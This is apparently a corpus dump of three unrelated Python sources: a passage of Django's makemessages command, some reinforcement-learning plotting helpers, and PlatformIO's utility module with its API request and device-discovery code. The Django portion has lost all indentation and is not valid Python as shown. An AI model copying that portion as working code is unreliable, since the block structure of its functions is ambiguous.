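# Example (illustrative): normalize_eols('msgid "a"\r\nmsgstr ""\r\n') returns
# 'msgid "a"\nmsgstr ""\n', i.e. CRLF sequences are collapsed to '\n' and the
# trailing newline is preserved.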
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
if 'charset=CHARSET' in line:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
lines.append(line)
msgs = '\n'.join(lines)
# Force newlines of POT files to '\n' to work around
# https://savannah.gnu.org/bugs/index.php?52395
with open(potfile, 'a', encoding='utf-8', newline='\n') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = []
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true',
help='Follows symlinks to directories when examining source code '
'and templates for translation strings.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore files or directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
parser.add_argument(
'--no-default-ignore', action='store_false', dest='use_default_ignore_patterns',
help="Don't ignore the common glob-style patterns 'CVS', '.*', '*~' and '*.pyc'.",
)
parser.add_argument(
'--no-wrap', action='store_true',
help="Don't break long message lines into several lines.",
)
parser.add_argument(
'--no-location', action='store_true',
help="Don't write '#: filename:line' lines.",
)
parser.add_argument(
'--add-location',
choices=('full', 'file', 'never'), const='full', nargs='?',
help=(
"Controls '#: filename:line' lines. If the option is 'full' "
"(the default if not given), the lines include both file name "
"and line number. If it's 'file', the line number is omitted. If "
"it's 'never', the lines are suppressed (same as --no-location). "
"--add-location requires gettext 0.19 or newer."
),
)
parser.add_argument(
'--no-obsolete', action='store_true',
help="Remove obsolete message strings.",
)
parser.add_argument(
'--keep-pot', action='store_true',
help="Keep .pot file after making messages. Useful when debugging.",
)
def handle(self, *args, **options):
locale = options['locale']
exclude = options['exclude']
self.domain = options['domain']
self.verbosity = options['verbosity']
process_all = options['all']
extensions = options['extensions']
self.symlinks = options['symlinks']
ignore_patterns = options['ignore_patterns']
if options['use_default_ignore_patterns']:
ignore_patterns += ['CVS', '.*', '*~', '*.pyc']
self.ignore_patterns = list(set(ignore_patterns))
# Avoid messing with mutable class variables
if options['no_wrap']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-wrap']
self.msguniq_options = self.msguniq_options[:] + ['--no-wrap']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-wrap']
self.xgettext_options = self.xgettext_options[:] + ['--no-wrap']
if options['no_location']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-location']
self.msguniq_options = self.msguniq_options[:] + ['--no-location']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-location']
self.xgettext_options = self.xgettext_options[:] + ['--no-location']
if options['add_location']:
if self.gettext_version < (0, 19):
raise CommandError(
"The --add-location option requires gettext 0.19 or later. "
"You have %s." % '.'.join(str(x) for x in self.gettext_version)
)
arg_add_location = "--add-location=%s" % options['add_location']
self.msgmerge_options = self.msgmerge_options[:] + [arg_add_location]
self.msguniq_options = self.msguniq_options[:] + [arg_add_location]
self.msgattrib_options = self.msgattrib_options[:] + [arg_add_location]
self.xgettext_options = self.xgettext_options[:] + [arg_add_location]
self.no_obsolete = options['no_obsolete']
self.keep_pot = options['keep_pot']
if self.domain not in ('django', 'djangojs'):
raise CommandError("currently makemessages only supports domains "
"'django' and 'djangojs'")
if self.domain == 'djangojs':
exts = extensions or ['js']
else:
exts = extensions or ['html', 'txt', 'py']
self.extensions = handle_extensions(exts)
if (not locale and not exclude and not process_all) or self.domain is None:
raise CommandError(
"Type '%s help %s' for usage information."
% (os.path.basename(sys.argv[0]), sys.argv[1])
)
if self.verbosity > 1:
self.stdout.write(
'examining files with the extensions: %s'
% get_text_list(list(self.extensions), 'and')
)
self.invoked_for_django = False
self.locale_paths = []
self.default_locale_path = None
if os.path.isdir(os.path.join('conf', 'locale')):
self.locale_paths = [os.path.abspath(os.path.join('conf', 'locale'))]
self.default_locale_path = self.locale_paths[0]
self.invoked_for_django = True
else:
if self.settings_available:
self.locale_paths.extend(settings.LOCALE_PATHS)
# Allow to run makemessages inside an app dir
if os.path.isdir('locale'):
self.locale_paths.append(os.path.abspath('locale'))
if self.locale_paths:
self.default_locale_path = self.locale_paths[0]
os.makedirs(self.default_locale_path, exist_ok=True)
# Build locale list
looks_like_locale = re.compile(r'[a-z]{2}')
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % self.default_locale_path))
all_locales = [
lang_code for lang_code in map(os.path.basename, locale_dirs)
if looks_like_locale.match(lang_code)
]
# Account for excluded locales
if process_all:
locales = all_locales
else:
locales = locale or all_locales
locales = set(locales).difference(exclude)
if locales:
check_programs('msguniq', 'msgmerge', 'msgattrib')
check_programs('xgettext')
try:
potfiles = self.build_potfiles()
# Build po files for each selected locale
for locale in locales:
if '-' in locale:
self.stdout.write(
'invalid locale %s, did you mean %s?' % (
locale,
locale.replace('-', '_'),
),
)
continue
if self.verbosity > 0:
self.stdout.write('processing locale %s' % locale)
for potfile in potfiles:
self.write_po_file(potfile, locale)
finally:
if not self.keep_pot:
self.remove_potfiles()
@cached_property
def gettext_version(self):
# Gettext tools will output system-encoded bytestrings instead of UTF-8,
# when looking up the version. It's especially a problem on Windows.
out, err, status = popen_wrapper(
['xgettext', '--version'],
stdout_encoding=DEFAULT_LOCALE_ENCODING,
)
m = re.search(r'(\d+)\.(\d+)\.?(\d+)?', out)
if m:
return tuple(int(d) for d in m.groups() if d is not None)
else:
raise CommandError("Unable to get gettext version. Is it installed?")
@cached_property
def settings_available(self):
try:
settings.LOCALE_PATHS
except ImproperlyConfigured:
if self.verbosity > 1:
self.stderr.write("Running without configured settings.")
return False
return True
def build_potfiles(self):
"""
Build pot files and apply msguniq to them.
"""
file_list = self.find_files(".")
self.remove_potfiles()
self.process_files(file_list)
potfiles = []
for path in self.locale_paths:
potfile = os.path.join(path, '%s.pot' % self.domain)
if not os.path.exists(potfile):
continue
args = ['msguniq'] + self.msguniq_options + [potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msguniq\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
msgs = normalize_eols(msgs)
with open(potfile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
potfiles.append(potfile)
return potfiles
def remove_potfiles(self):
for path in self.locale_paths:
pot_path = os.path.join(path, '%s.pot' % self.domain)
if os.path.exists(pot_path):
os.unlink(pot_path)
def find_files(self, root):
"""
Get all files in the given root. Also check that there is a matching
locale dir for each file.
"""
all_files = []
ignored_roots = []
if self.settings_available:
ignored_roots = [os.path.normpath(p) for p in (settings.MEDIA_ROOT, settings.STATIC_ROOT) if p]
for dirpath, dirnames, filenames in os.walk(root, topdown=True, followlinks=self.symlinks):
for dirname in dirnames[:]:
if (is_ignored_path(os.path.normpath(os.path.join(dirpath, dirname)), self.ignore_patterns) or
os.path.join(os.path.abspath(dirpath), dirname) in ignored_roots):
dirnames.remove(dirname)
if self.verbosity > 1:
self.stdout.write('ignoring directory %s' % dirname)
elif dirname == 'locale':
dirnames.remove(dirname)
self.locale_paths.insert(0, os.path.join(os.path.abspath(dirpath), dirname))
for filename in filenames:
file_path = os.path.normpath(os.path.join(dirpath, filename))
file_ext = os.path.splitext(filename)[1]
if file_ext not in self.extensions or is_ignored_path(file_path, self.ignore_patterns):
if self.verbosity > 1:
self.stdout.write('ignoring file %s in %s' % (filename, dirpath))
else:
locale_dir = None
for path in self.locale_paths:
if os.path.abspath(dirpath).startswith(os.path.dirname(path)):
locale_dir = path
break
locale_dir = locale_dir or self.default_locale_path or NO_LOCALE_DIR
all_files.append(self.translatable_file_class(dirpath, filename, locale_dir))
return sorted(all_files)
def process_files(self, file_list):
"""
Group translatable files by locale directory and run pot file build
process for each group.
"""
file_groups = {}
for translatable in file_list:
file_group = file_groups.setdefault(translatable.locale_dir, [])
file_group.append(translatable)
for locale_dir, files in file_groups.items():
self.process_locale_dir(locale_dir, files)
def process_locale_dir(self, locale_dir, files):
"""
Extract translatable literals from the specified files, creating or
updating the POT file for a given locale directory.
Use the xgettext GNU gettext utility.
"""
build_files = []
for translatable in files:
if self.verbosity > 1:
self.stdout.write('processing file %s in %s' % (
translatable.file, translatable.dirpath
))
if self.domain not in ('djangojs', 'django'):
continue
build_file = self.build_file_class(self, self.domain, translatable)
try:
build_file.preprocess()
except UnicodeDecodeError as e:
self.stdout.write(
'UnicodeDecodeError: skipped file %s in %s (reason: %s)' % (
translatable.file, translatable.dirpath, e,
)
)
continue
build_files.append(build_file)
if self.domain == 'djangojs':
is_templatized = build_file.is_templatized
args = [
'xgettext',
'-d', self.domain,
'--language=%s' % ('C' if is_templatized else 'JavaScript',),
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--output=-',
]
elif self.domain == 'django':
args = [
'xgettext',
'-d', self.domain,
'--language=Python',
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--keyword=pgettext_lazy:1c,2',
'--keyword=npgettext_lazy:1c,2,3',
'--output=-',
]
else:
return
input_files = [bf.work_path for bf in build_files]
with NamedTemporaryFile(mode='w+') as input_files_list:
input_files_list.write('\n'.join(input_files))
input_files_list.flush()
args.extend(['--files-from', input_files_list.name])
args.extend(self.xgettext_options)
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
for build_file in build_files:
build_file.cleanup()
raise CommandError(
'errors happened while running xgettext on %s\n%s' %
('\n'.join(input_files), errors)
)
elif self.verbosity > 0:
# Print warnings
self.stdout.write(errors)
if msgs:
if locale_dir is NO_LOCALE_DIR:
file_path = os.path.normpath(build_files[0].path)
raise CommandError(
'Unable to find a locale path to store translations for '
'file %s' % file_path
)
for build_file in build_files:
msgs = build_file.postprocess_messages(msgs)
potfile = os.path.join(locale_dir, '%s.pot' % self.domain)
write_pot_file(potfile, msgs)
for build_file in build_files:
build_file.cleanup()
def write_po_file(self, potfile, locale):
"""
Create or update the PO file for self.domain and `locale`.
Use contents of the existing `potfile`.
Use msgmerge and msgattrib GNU gettext utilities.
"""
basedir = os.path.join(os.path.dirname(potfile), locale, 'LC_MESSAGES')
os.makedirs(basedir, exist_ok=True)
pofile = os.path.join(basedir, '%s.po' % self.domain)
if os.path.exists(pofile):
args = ['msgmerge'] + self.msgmerge_options + [pofile, potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgmerge\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
else:
with open(potfile, encoding='utf-8') as fp:
msgs = fp.read()
if not self.invoked_for_django:
msgs = self.copy_plural_forms(msgs, locale)
msgs = normalize_eols(msgs)
msgs = msgs.replace(
"#. #-#-#-#-# %s.pot (PACKAGE VERSION) #-#-#-#-#\n" % self.domain, "")
with open(pofile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
if self.no_obsolete:
args = ['msgattrib'] + self.msgattrib_options + ['-o', pofile, pofile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgattrib\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
def copy_plural_forms(self, msgs, locale):
"""
Copy plural forms header contents from a Django catalog of locale to
the msgs string, inserting it at the right place. msgs should be the
contents of a newly created .po file.
"""
django_dir = os.path.normpath(os.path.join(os.path.dirname(django.__file__)))
if self.domain == 'djangojs':
domains = ('djangojs', 'django')
else:
domains = ('django',)
for domain in domains:
django_po = os.path.join(django_dir, 'conf', 'locale', locale, 'LC_MESSAGES', '%s.po' % domain)
if os.path.exists(django_po):
with open(django_po, encoding='utf-8') as fp:
m = plural_forms_re.search(fp.read())
if m:
plural_form_line = m['value']
if self.verbosity > 1:
self.stdout.write('copying plural forms: %s' % plural_form_line)
lines = []
found = False
for line in msgs.splitlines():
if not found and (not line or plural_forms_re.search(line)):
line = plural_form_line
found = True
lines.append(line)
msgs = '\n'.join(lines)
break
return msgs
|
the-stack_106_13017
|
import matplotlib.pyplot as plt
import os
import numpy as np
from utils.collect_config import ParameterConfig
import pickle as pkl
def get_color_by_lable(label, index):
new_colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
color_dict = {
}
if label in color_dict.keys():
return color_dict[label]
else:
        return new_colors[index % len(new_colors)]
def write_param_log(agent_params, env_params, env, file_path, exp_params=None, save_pkl=False, print_log=False):
if os.path.isfile(file_path + "/record.pkl"):
print("Log exist")
if save_pkl:
obj = ParameterConfig()
setattr(obj, "agent_params", agent_params)
setattr(obj, "env_params", env_params)
setattr(obj, "environment", env)
with open(file_path+"/record.pkl", "wb") as param_obj:
pkl.dump(obj, param_obj)
print("param saved in", file_path)
with open(file_path + "/param.txt", "w") as param_record:
param_record.write("------ Agent parameters ------\n\n")
est_len = 20
for pair in agent_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(agent_params.__dict__[pair]))
info = str(pair) + space + str(agent_params.__dict__[pair]) + "\n"
param_record.write(info)
param_record.write("\n\n------ Environment parameters ------\n\n")
param_record.write("Env: " + str(env) + "\n\n")
for pair in env_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(env_params.__dict__[pair]))
info = str(pair) + space + str(env_params.__dict__[pair]) + "\n"
param_record.write(info)
if exp_params is not None:
param_record.write("\n\n------ Control exp parameters ------\n\n")
for pair in exp_params.__dict__:
space = " " * (est_len - len(str(pair))) + ": "
if print_log: print(str(pair), space, str(exp_params.__dict__[pair]))
info = str(pair) + space + str(exp_params.__dict__[pair]) + "\n"
param_record.write(info)
print("log saved in", file_path)
def plot_control_exp_curve(all_data, label, lim_x, lim_y, ignore_zero=False, exp_smooth=None, save_path=None, handcode=None, best="largeAUC"):
best_lrs = {}
for k in all_data.keys():
plt.figure()
plt.xlim(lim_x[0], lim_x[1])
plt.ylim(lim_y[0], lim_y[1])
print("\ntitle", k)
mean, upper, lower, lr = plot_control_exp_curve_single_key(plt, all_data[k], label[k], lim_x, lim_y, ignore_zero=ignore_zero, exp_smooth=exp_smooth, best=best)
best_lrs[k] = [mean, upper, lower, lr]
plt.title(k)
plt.legend()
if save_path:
plt.savefig(save_path + k + ".png")
plt.close()
plt.clf()
if not save_path:
plt.show()
plt.figure()
plt.xlim(lim_x[0], lim_x[1])
plt.ylim(lim_y[0], lim_y[1])
for bk in best_lrs.keys():
mean, upper, lower, lr = best_lrs[bk]
lb = str(bk)
x = np.linspace(1, len(mean), len(mean))
plt.plot(x, mean, label=lb)
plt.fill_between(x, upper, lower, alpha=0.3)
plt.xticks(lim_x, lim_x)
curve = np.clip(mean, lim_y[0], lim_y[1])
# auc = np.sum(curve - lim_y[0])
if handcode is not None:
mean, upper, lower = calculate_avg_default(handcode, exp_smooth=exp_smooth)
x = np.linspace(1, len(mean), len(mean))
plt.plot(x, mean, "--", label="hand_code")
plt.title("best settings")
plt.legend()
plt.show()
def plot_control_exp_curve_single_key(canvas, all_data, labels, range_x, range_y, ignore_zero=False, exp_smooth=None, best="largeAUC"):
auc = np.zeros(len(all_data))
for i in range(len(all_data)):
c = get_color_by_lable(labels[i], i)
if ignore_zero:
mean, upper, lower = calculate_avg_ignoring_zero(all_data[i], exp_smooth=exp_smooth)
else:
mean, upper, lower = calculate_avg_default(all_data[i], exp_smooth=exp_smooth)
x = np.linspace(1, len(mean), len(mean))
canvas.plot(x, mean, label=labels[i], color=c)
canvas.fill_between(x, upper, lower, facecolor=c, alpha=0.3)
curve = mean[range_x[0]-1: range_x[1]]
auc[i] = np.sum(curve[len(curve)//2:] - range_y[0])
print("All auc =", auc)
print("All lr =", labels)
best_i = np.argmax(auc) if best == "largeAUC" else np.argmin(auc)
mean, upper, lower = calculate_avg_default(all_data[best_i], exp_smooth=exp_smooth)
print("Best setting =", auc[best_i], labels[best_i])
return mean, upper, lower, labels[best_i]
def calculate_avg_ignoring_zero(data, exp_smooth=None):
if exp_smooth is not None:
data_temp = []
for i in data:
zero_idx = np.where(i == 0)[0]
if len(zero_idx) == 0:
data_temp.append(i)
else:
data_temp.append(i[:zero_idx[0]])
data_temp = np.array(data_temp)
data = exponential_smooth(data_temp, beta=exp_smooth)
max_len = data.shape[1]
num_run = data.shape[0]
done = False
i = 0
mean = []
ste = []
while i < max_len and not done:
bits = data[:, i]
        count_nonzero = np.where(bits != 0)[0]
if len(count_nonzero) < (num_run * 0.5):
done = True
else:
mean.append(np.sum(bits[count_nonzero]) / len(count_nonzero))
ste.append(np.abs(np.std(bits[count_nonzero])) / np.sqrt(len(count_nonzero)))
i += 1
mean = np.array(mean)
ste = np.array(ste)
upper = mean + ste
lower = mean - ste
return mean, upper, lower
def calculate_avg_default(data, exp_smooth=None):
if exp_smooth is not None:
data = exponential_smooth(data, beta=exp_smooth)
mean = data.mean(axis=0)
ste = np.abs(np.std(data, axis=0)) / np.sqrt(len(data))
upper = mean + ste
lower = mean - ste
return mean, upper, lower
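# Illustrative sketch (an assumption, not part of the original utilities):
# calculate_avg_default() averages runs along axis 0 and pads the band by one
# standard error, i.e. std / sqrt(number of runs).
def _demo_calculate_avg_default():
    runs = np.array([[1.0, 2.0, 3.0],
                     [3.0, 4.0, 5.0]])
    mean, upper, lower = calculate_avg_default(runs)
    assert np.allclose(mean, [2.0, 3.0, 4.0])
    assert np.allclose(upper - mean, 1.0 / np.sqrt(2))  # std=1 over 2 runs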
def exponential_smooth(all_data, beta):
max_len = np.max(np.array([len(i) for i in all_data]))
all_row = np.zeros((len(all_data), max_len))
for i in range(len(all_data)):
data = all_data[i]
J = 0
new_data = np.zeros(len(data))
for idx in range(len(data)):
J *= (1-beta)
J += beta
rate = beta / J
if idx == 0:
new_data[idx] = data[idx] * rate
else:
new_data[idx] = data[idx] * rate + new_data[idx - 1] * (1 - rate)
all_row[i, :len(new_data)] = new_data
return all_row
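# Illustrative sketch (an assumption about intended behaviour): the smoothing
# above is a bias-corrected exponential moving average, so the first smoothed
# point equals the raw value and later points only partially track a step.
def _demo_exponential_smooth():
    raw = [np.array([0.0, 0.0, 1.0, 1.0])]
    smoothed = exponential_smooth(raw, beta=0.5)
    assert smoothed[0, 0] == 0.0
    assert 0.0 < smoothed[0, 2] < 1.0  # the jump from 0 to 1 is damped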
|
the-stack_106_13018
|
# Copyright (c) 2014-present PlatformIO <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import os
import platform
import re
import socket
import sys
import time
from contextlib import contextmanager
from functools import wraps
from glob import glob
import click
import requests
from platformio import __apiurl__, __version__, exception
from platformio.commands import PlatformioCLI
from platformio.compat import PY2, WINDOWS
from platformio.fs import cd # pylint: disable=unused-import
from platformio.fs import load_json # pylint: disable=unused-import
from platformio.fs import rmtree as rmtree_ # pylint: disable=unused-import
from platformio.proc import exec_command # pylint: disable=unused-import
from platformio.proc import is_ci # pylint: disable=unused-import
# KEEP unused imports for backward compatibility with PIO Core 3.0 API
class memoized(object):
def __init__(self, expire=0):
expire = str(expire)
if expire.isdigit():
expire = "%ss" % int((int(expire) / 1000))
tdmap = {"s": 1, "m": 60, "h": 3600, "d": 86400}
assert expire.endswith(tuple(tdmap))
self.expire = int(tdmap[expire[-1]] * int(expire[:-1]))
self.cache = {}
def __call__(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in self.cache or (
self.expire > 0 and self.cache[key][0] < time.time() - self.expire
):
self.cache[key] = (time.time(), func(*args, **kwargs))
return self.cache[key][1]
wrapper.reset = self._reset
return wrapper
def _reset(self):
self.cache.clear()
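# Illustrative usage sketch (not part of PlatformIO): cache a slow lookup for
# five seconds. Both helper names below are hypothetical.
@memoized(expire="5s")
def _demo_cached_lookup(key):
    return {"key": key, "fetched_at": time.time()}
def _demo_memoized_usage():
    first = _demo_cached_lookup("boards")
    second = _demo_cached_lookup("boards")
    assert first is second  # served from the cache within the expiry window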
class throttle(object):
def __init__(self, threshhold):
self.threshhold = threshhold # milliseconds
self.last = 0
def __call__(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
diff = int(round((time.time() - self.last) * 1000))
if diff < self.threshhold:
time.sleep((self.threshhold - diff) * 0.001)
self.last = time.time()
return func(*args, **kwargs)
return wrapper
def singleton(cls):
""" From PEP-318 http://www.python.org/dev/peps/pep-0318/#examples """
_instances = {}
def get_instance(*args, **kwargs):
if cls not in _instances:
_instances[cls] = cls(*args, **kwargs)
return _instances[cls]
return get_instance
@contextmanager
def capture_std_streams(stdout, stderr=None):
_stdout = sys.stdout
_stderr = sys.stderr
sys.stdout = stdout
sys.stderr = stderr or stdout
yield
sys.stdout = _stdout
sys.stderr = _stderr
def get_systype():
type_ = platform.system().lower()
arch = platform.machine().lower()
if type_ == "windows":
arch = "amd64" if platform.architecture()[0] == "64bit" else "x86"
return "%s_%s" % (type_, arch) if arch else type_
def pioversion_to_intstr():
vermatch = re.match(r"^([\d\.]+)", __version__)
assert vermatch
return [int(i) for i in vermatch.group(1).split(".")[:3]]
def change_filemtime(path, mtime):
os.utime(path, (mtime, mtime))
def get_serial_ports(filter_hwid=False):
try:
# pylint: disable=import-outside-toplevel
from serial.tools.list_ports import comports
except ImportError:
raise exception.GetSerialPortsError(os.name)
result = []
for p, d, h in comports():
if not p:
continue
if WINDOWS and PY2:
try:
# pylint: disable=undefined-variable
d = unicode(d, errors="ignore")
except TypeError:
pass
if not filter_hwid or "VID:PID" in h:
result.append({"port": p, "description": d, "hwid": h})
if filter_hwid:
return result
# fix for PySerial
if not result and "darwin" in get_systype():
for p in glob("/dev/tty.*"):
result.append({"port": p, "description": "n/a", "hwid": "n/a"})
return result
# Backward compatibility for PIO Core <3.5
get_serialports = get_serial_ports
def get_logical_devices():
items = []
if WINDOWS:
try:
result = exec_command(
["wmic", "logicaldisk", "get", "name,VolumeName"]
).get("out", "")
devicenamere = re.compile(r"^([A-Z]{1}\:)\s*(\S+)?")
for line in result.split("\n"):
match = devicenamere.match(line.strip())
if not match:
continue
items.append({"path": match.group(1) + "\\", "name": match.group(2)})
return items
except WindowsError: # pylint: disable=undefined-variable
pass
# try "fsutil"
result = exec_command(["fsutil", "fsinfo", "drives"]).get("out", "")
for device in re.findall(r"[A-Z]:\\", result):
items.append({"path": device, "name": None})
return items
result = exec_command(["df"]).get("out")
devicenamere = re.compile(r"^/.+\d+\%\s+([a-z\d\-_/]+)$", flags=re.I)
for line in result.split("\n"):
match = devicenamere.match(line.strip())
if not match:
continue
items.append({"path": match.group(1), "name": os.path.basename(match.group(1))})
return items
def get_mdns_services():
# pylint: disable=import-outside-toplevel
try:
import zeroconf
except ImportError:
from site import addsitedir
from platformio.managers.core import get_core_package_dir
contrib_pysite_dir = get_core_package_dir("contrib-pysite")
addsitedir(contrib_pysite_dir)
sys.path.insert(0, contrib_pysite_dir)
import zeroconf # pylint: disable=import-outside-toplevel
class mDNSListener(object):
def __init__(self):
self._zc = zeroconf.Zeroconf(interfaces=zeroconf.InterfaceChoice.All)
self._found_types = []
self._found_services = []
def __enter__(self):
zeroconf.ServiceBrowser(self._zc, "_services._dns-sd._udp.local.", self)
return self
def __exit__(self, etype, value, traceback):
self._zc.close()
def remove_service(self, zc, type_, name):
pass
def add_service(self, zc, type_, name):
try:
assert zeroconf.service_type_name(name)
assert str(name)
except (AssertionError, UnicodeError, zeroconf.BadTypeInNameException):
return
if name not in self._found_types:
self._found_types.append(name)
zeroconf.ServiceBrowser(self._zc, name, self)
if type_ in self._found_types:
s = zc.get_service_info(type_, name)
if s:
self._found_services.append(s)
def get_services(self):
return self._found_services
items = []
with mDNSListener() as mdns:
time.sleep(3)
for service in mdns.get_services():
properties = None
if service.properties:
try:
properties = {
k.decode("utf8"): v.decode("utf8")
if isinstance(v, bytes)
else v
for k, v in service.properties.items()
}
json.dumps(properties)
except UnicodeDecodeError:
properties = None
items.append(
{
"type": service.type,
"name": service.name,
"ip": ".".join(
[
str(c if isinstance(c, int) else ord(c))
for c in service.address
]
),
"port": service.port,
"properties": properties,
}
)
return items
def get_request_defheaders():
data = (__version__, int(is_ci()), requests.utils.default_user_agent())
return {"User-Agent": "PlatformIO/%s CI/%d %s" % data}
@memoized(expire="60s")
def _api_request_session():
return requests.Session()
@throttle(500)
def _get_api_result(
url, params=None, data=None, auth=None # pylint: disable=too-many-branches
):
from platformio.app import get_setting # pylint: disable=import-outside-toplevel
result = {}
r = None
verify_ssl = sys.version_info >= (2, 7, 9)
headers = get_request_defheaders()
if not url.startswith("http"):
url = __apiurl__ + url
if not get_setting("strict_ssl"):
url = url.replace("https://", "http://")
try:
if data:
r = _api_request_session().post(
url,
params=params,
data=data,
headers=headers,
auth=auth,
verify=verify_ssl,
)
else:
r = _api_request_session().get(
url, params=params, headers=headers, auth=auth, verify=verify_ssl
)
result = r.json()
r.raise_for_status()
return r.text
except requests.exceptions.HTTPError as e:
if result and "message" in result:
raise exception.APIRequestError(result["message"])
if result and "errors" in result:
raise exception.APIRequestError(result["errors"][0]["title"])
raise exception.APIRequestError(e)
except ValueError:
raise exception.APIRequestError("Invalid response: %s" % r.text.encode("utf-8"))
finally:
if r:
r.close()
return None
def get_api_result(url, params=None, data=None, auth=None, cache_valid=None):
from platformio.app import ContentCache # pylint: disable=import-outside-toplevel
total = 0
max_retries = 5
cache_key = (
ContentCache.key_from_args(url, params, data, auth) if cache_valid else None
)
while total < max_retries:
try:
with ContentCache() as cc:
if cache_key:
result = cc.get(cache_key)
if result is not None:
return json.loads(result)
# check internet before and resolve issue with 60 seconds timeout
internet_on(raise_exception=True)
result = _get_api_result(url, params, data)
if cache_valid:
with ContentCache() as cc:
cc.set(cache_key, result, cache_valid)
return json.loads(result)
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
total += 1
if not PlatformioCLI.in_silence():
click.secho(
"[API] ConnectionError: {0} (incremented retry: max={1}, "
"total={2})".format(e, max_retries, total),
fg="yellow",
)
time.sleep(2 * total)
raise exception.APIRequestError(
"Could not connect to PlatformIO API Service. Please try later."
)
PING_INTERNET_IPS = [
"192.30.253.113", # github.com
"78.46.220.20", # dl.platformio.org
]
@memoized(expire="5s")
def _internet_on():
timeout = 2
socket.setdefaulttimeout(timeout)
for ip in PING_INTERNET_IPS:
try:
if os.getenv("HTTP_PROXY", os.getenv("HTTPS_PROXY")):
requests.get("http://%s" % ip, allow_redirects=False, timeout=timeout)
else:
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((ip, 80))
return True
except: # pylint: disable=bare-except
pass
return False
def internet_on(raise_exception=False):
result = _internet_on()
if raise_exception and not result:
raise exception.InternetIsOffline()
return result
def pepver_to_semver(pepver):
return re.sub(r"(\.\d+)\.?(dev|a|b|rc|post)", r"\1-\2.", pepver, 1)
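# Illustrative sketch (an assumption, not part of PlatformIO): PEP 440
# pre-release suffixes are rewritten into semver-style pre-release tags.
def _demo_pepver_to_semver():
    assert pepver_to_semver("1.2.3.dev4") == "1.2.3-dev.4"
    assert pepver_to_semver("4.0.0a2") == "4.0.0-a.2"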
def items_to_list(items):
if not isinstance(items, list):
items = [i.strip() for i in items.split(",")]
return [i.lower() for i in items if i]
def items_in_list(needle, haystack):
needle = items_to_list(needle)
haystack = items_to_list(haystack)
if "*" in needle or "*" in haystack:
return True
return set(needle) & set(haystack)
def parse_date(datestr):
if "T" in datestr and "Z" in datestr:
return time.strptime(datestr, "%Y-%m-%dT%H:%M:%SZ")
return time.strptime(datestr)
def merge_dicts(d1, d2, path=None):
if path is None:
path = []
for key in d2:
if key in d1 and isinstance(d1[key], dict) and isinstance(d2[key], dict):
merge_dicts(d1[key], d2[key], path + [str(key)])
else:
d1[key] = d2[key]
return d1
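# Illustrative sketch (an assumption): merge_dicts() merges nested dicts in
# place, recursing where both sides hold dicts and letting d2 win otherwise.
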